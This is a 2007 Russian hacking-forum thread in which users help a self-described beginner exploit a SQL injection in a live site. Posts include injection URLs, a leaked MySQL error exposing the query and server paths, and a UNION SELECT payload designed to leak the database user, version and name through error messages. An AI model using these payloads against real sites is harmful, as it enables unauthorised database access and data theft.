Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
18.11.2007, 00:46
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
Страшной запрос
MySQL injection.
http://wtf.com/country/ukraine/4/?page=-2%20union/**/select/**/45,15/*
Гы, ет наверно я только так тупо запросы формирую 
При етом выдает нечто страшное:
PHP код:
SELECT ai.id, ah.headline, at.full_text, am.smallimage_url as img, at.announce, lah.headline as en_name, lower(si.name), si.url, si.ahref as site_title, st.description FROM elgov_articleitem as ai, elgov_articletext as at, elgov_articleheadline as ah, elgov_subjectitem as si, elgov_subjecttitle as st JOIN elgov_articleactivity as aa LEFT JOIN elgov_articleimage as am ON (am.item_id = ai.id) LEFT JOIN elgov_articleheadline as lah ON (lah.item_id = ai.id AND lah.lang_id = 5) WHERE ai.id = ah.item_id AND ai.examine = 1 AND ai.id = at.item_id AND ah.lang_id = 7 AND at.lang_id = ah.lang_id AND ai.inode = si.id AND lower(si.name) = 'ukraine' AND st.item_id = si.id AND st.lang_id = ah.lang_id AND aa.article_id = ai.id AND aa.inode = 4 GROUP BY ai.id ORDER BY ah.headline LIMIT -45, 15
[ MYSQL ERROR ]: SELECT ai.id, ah.headline, at.full_text, am.smallimage_url as img, at.announce, lah.headline as en_name, lower(si.name), si.url, si.ahref as site_title, st.description FROM elgov_articleitem as ai, elgov_articletext as at, elgov_articleheadline as ah, elgov_subjectitem as si, elgov_subjecttitle as st JOIN elgov_articleactivity as aa LEFT JOIN elgov_articleimage as am ON (am.item_id = ai.id) LEFT JOIN elgov_articleheadline as lah ON (lah.item_id = ai.id AND lah.lang_id = 5) WHERE ai.id = ah.item_id AND ai.examine = 1 AND ai.id = at.item_id AND ah.lang_id = 7 AND at.lang_id = ah.lang_id AND ai.inode = si.id AND lower(si.name) = 'ukraine' AND st.item_id = si.id AND st.lang_id = ah.lang_id AND aa.article_id = ai.id AND aa.inode = 4 GROUP BY ai.id ORDER BY ah.headline LIMIT -45, 15 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-45, 15' at line 30 )
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /var/www/virtual/нечто/sm/self/lib/Adelite/SiteManager/db_sql.class.php on line 62
Warning: Cannot modify header information - headers already sent by (output started at /var/www/virtual/нечто/sm/self/lib/Adelite/SiteManager/db_sql.class.php:36) in /var/www/virtual/нечто/sm/self/lib/Adelite/SiteManager/server.class.php on line 209
Вы сразу скажите "линк в студию!"
Но дайте мне возможность сделать ету инэкцию самому, ибо я их тока начал изучать.Да, да мануалы на ачате читал...
Жду ваших советов.
П.С. Просьба не кричать ЛАМЕР!, тут всьо просто! 
__________________
BlackHat. MoDL
|
|
|
18.11.2007, 00:59
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
ничё ты тут не сделаешь
|
|
|
|
18.11.2007, 01:02
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
а как на шчот строки
PHP код:
( You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-45, 15' at line 30 )
__________________
BlackHat. MoDL
|
|
|
|
18.11.2007, 01:06
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
инъекция после limit'a
учи мат часть
|
|
|
|
19.11.2007, 13:25
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
Народ ну где тут иньекция после лимита?
Тут видимо два запроса результат первого вставляется во второй но в первый раз вижу чтобы лимит был с отрицательным значением... Но тут есть огромный плюс если моя догдадка верна раз отчет об ошибках есть, то и в ошибке ты увидишь ответ на твою иньекцию то есть юзай что то типа этого:
Код:
http://wtf.com/country/ukraine/4/?page=-2%20union/**/select/**/CONCAT_WS(0x20,USER(),VERSION(),DATABASE()),15/*
И в ошибке ты по идее должен увидеть что то типа
Код:
( You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-[имя юзера] [версияБД] [и имя самой БД], 15' at line 30 )
ЗЫ а вот ссылку бы не помешало бы, бо по этой тут ответ 404 ))
__________________
Кто я?..
|
|
|
|
19.11.2007, 13:49
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Spyder, если инжектируется параметр, который определяет какое-то значение из LIMIT, то что мешает с его помощью сформировать нормальный LIMIT, а потом к этому запросу сделать UNION+SELECT нужных тебе полей?
|
|
|
|
19.11.2007, 15:14
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
Сообщение от groundhog
Spyder, если инжектируется параметр, который определяет какое-то значение из LIMIT, то что мешает с его помощью сформировать нормальный LIMIT, а потом к этому запросу сделать UNION+SELECT нужных тебе полей?
Еще раз спрашиваю где вы увидели инжект в лимит?
__________________
Кто я?..
Последний раз редактировалось I-I()/Ib; 19.11.2007 в 15:17..
|
|
|
|
19.11.2007, 15:39
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
А ХЗ... Спайдер написал "инъекция после limit'a"... Я просто сказал что и в этом случае возможна успешная эксплуатация...
|
|
|
|
19.11.2007, 16:29
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
вот давайте он ссылку даст а вы раскрутите скуль, ок? =)
Spyder, если инжектируется параметр, который определяет какое-то значение из LIMIT, то что мешает с его помощью сформировать нормальный LIMIT, а потом к этому запросу сделать UNION+SELECT нужных тебе полей?
ты маны по SQL читал? UNION не может идти после оператора LIMIT
Последний раз редактировалось Spyder; 19.11.2007 в 16:43..
|
|
|
|
19.11.2007, 16:58
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Мало того, что читал, так ещё и попробовал запрос:
SELECT * from lala limit 0,1 union select * from lala where id=5
Как думаешь, каков был результат? Правильно! Две записи! Пробовал это на MySQL 4.1.10... Ты не путаешь с тройкой? Там действительно нельзя ставить после LIMIT объединение через UNION, потому что в тройке UNION вообще не поддерживается... |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
